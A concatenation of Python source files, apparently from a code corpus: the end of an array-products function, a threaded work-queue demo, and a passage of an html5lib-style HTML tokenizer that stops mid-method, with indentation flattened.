for i in range(0, len(arr)):
products_of_all_others[i] = backward_products[i]*forward_product;
forward_product *= arr[i];
return products_of_all_others
|
py | b414d12f5bc20531a3992665edcce4d456c94eed | # https://www.youtube.com/watch?v=NwH0HvMI4EA
import threading
from queue import Queue
import time
print_lock = threading.Lock()
# Queue that will be shared accross threads.
q = Queue()
def thread_body():
while True:
# This is blocking - until an element won't appear in the queue.
work_to_be_done = q.get()
time.sleep(0.5)
with print_lock:
print("Thread {}: realized {}".format(threading.current_thread().name, work_to_be_done))
# Inform queue that the task is done! (so join will proceed when all tasks will be finished!)
q.task_done()
# Create threads working in the background - deamons.
for x in range(10):
t = threading.Thread(target=thread_body)
# Deamon will stop along with the main thread.
t.daemon = True
t.start()
start = time.time()
# Add "work" to be done.
for work_to_be_done in range(20):
q.put(work_to_be_done)
# Wait until all tasks will be finished.
q.join()
print("Entire job took:", time.time() - start)
|
py | b414d1521f61ba5e72c8826b338b54c5a929175d | from __future__ import absolute_import, division, unicode_literals
try:
chr = unichr # flake8: noqa
except NameError:
pass
from collections import deque
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from .inputstream import HTMLInputStream
from .trie import Trie
entitiesTrie = Trie(entities)
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
Points to HTMLInputStream object.
"""
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=True, lowercaseAttrName=True, parser=None):
self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
self.parser = parser
# Perform case conversions?
self.lowercaseElementName = lowercaseElementName
self.lowercaseAttrName = lowercaseAttrName
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
We do our usually processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {'type': tokenTypes['ParseError'], 'data': self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int(''.join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = '\uFFFD'
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
try:
# Try/except needed as UCS-2 Python builds' unichar only works
# within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != ';':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'numeric-entity-without-semicolon'})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = '&'
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, '<', '&')
or (allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == '#':
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ('x', 'X'):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'expected-numeric-entity'})
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
else:
# At this point in the process might have named entity. Entities
# are stored in the global variable "entities".
#
# Consume characters and compare to these to a substring of the
# entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix(''.join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
# of ¬i for instance.
try:
entityName = entitiesTrie.longest_prefix(''.join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ';':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'named-entity-without-semicolon'})
if (entityName[-1] != ';' and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == '=')):
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += ''.join(charStack[entityLength:])
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-named-entity'})
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
if fromAttribute:
self.currentToken['data'][-1][1] += output
else:
if output in spaceCharacters:
tokenType = 'SpaceCharacters'
else:
tokenType = 'Characters'
self.tokenQueue.append({'type': tokenTypes[tokenType], 'data': output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token['type'] in tagTokenTypes):
if self.lowercaseElementName:
token['name'] = token['name'].translate(asciiUpper2Lower)
if token['type'] == tokenTypes['EndTag']:
if token['data']:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'attributes-in-end-tag'})
if token['selfClosing']:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'self-closing-flag-on-end-tag'})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
def dataState(self):
data = self.stream.char()
if data == '&':
self.state = self.entityDataState
elif data == '<':
self.state = self.tagOpenState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\u0000'})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({'type': tokenTypes['SpaceCharacters'], 'data':
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(('&', '<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == '&':
self.state = self.characterReferenceInRcdata
elif data == '<':
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({'type': tokenTypes['SpaceCharacters'], 'data':
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(('&', '<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == '<':
self.state = self.rawtextLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(('<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == '<':
self.state = self.scriptDataLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(('<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + self.stream.charsUntil('\u0000')})
return True
def tagOpenState(self):
data = self.stream.char()
if data == '!':
self.state = self.markupDeclarationOpenState
elif data == '/':
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {'type': tokenTypes['StartTag'],
'name': data, 'data': [],
'selfClosing': False,
'selfClosingAcknowledged': False}
self.state = self.tagNameState
elif data == '>':
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name-but-got-right-bracket'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<>'})
self.state = self.dataState
elif data == '?':
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name-but-got-question-mark'})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {'type': tokenTypes['EndTag'], 'name': data,
'data': [], 'selfClosing': False}
self.state = self.tagNameState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-right-bracket'})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-eof'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-char',
'datavars': {'data': data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '>':
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-tag-name'})
self.state = self.dataState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] += '\uFFFD'
else:
self.currentToken['name'] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.scriptDataEndTagOpenState
elif data == '!':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<!'})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashState
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(('<', '-', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashDashState
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '>'})
self.state = self.scriptDataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<' + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(('/', '>'))):
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
if self.temporaryBuffer.lower() == 'script':
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataDoubleEscapedDashState
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '>'})
self.state = self.scriptDataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '/'})
self.temporaryBuffer = ''
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(('/', '>'))):
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
if self.temporaryBuffer.lower() == 'script':
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '>':
self.emitCurrentToken()
elif data == '/':
self.state = self.selfClosingStartTagState
elif data in ("'", '"', '=', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'invalid-character-in-attribute-name'})
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'].append(['\uFFFD', ''])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-name-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == '=':
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken['data'][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == '>':
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][0] += '\uFFFD'
leavingThisState = False
elif data in ("'", '"', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'invalid-character-in-attribute-name'})
self.currentToken['data'][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'eof-in-attribute-name'})
self.state = self.dataState
else:
self.currentToken['data'][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken['data'][-1][0] = (
self.currentToken['data'][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken['data'][:-1]:
if self.currentToken['data'][-1][0] == name:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'duplicate-attribute'})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == '=':
self.state = self.beforeAttributeValueState
elif data == '>':
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'].append(['\uFFFD', ''])
self.state = self.attributeNameState
elif data in ("'", '"', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'invalid-character-after-attribute-name'})
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-end-of-tag-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == '&':
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-value-but-got-right-bracket'})
self.emitCurrentToken()
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
self.state = self.attributeValueUnQuotedState
elif data in ('=', '<', '`'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'equals-in-unquoted-attribute-value'})
self.currentToken['data'][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-value-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
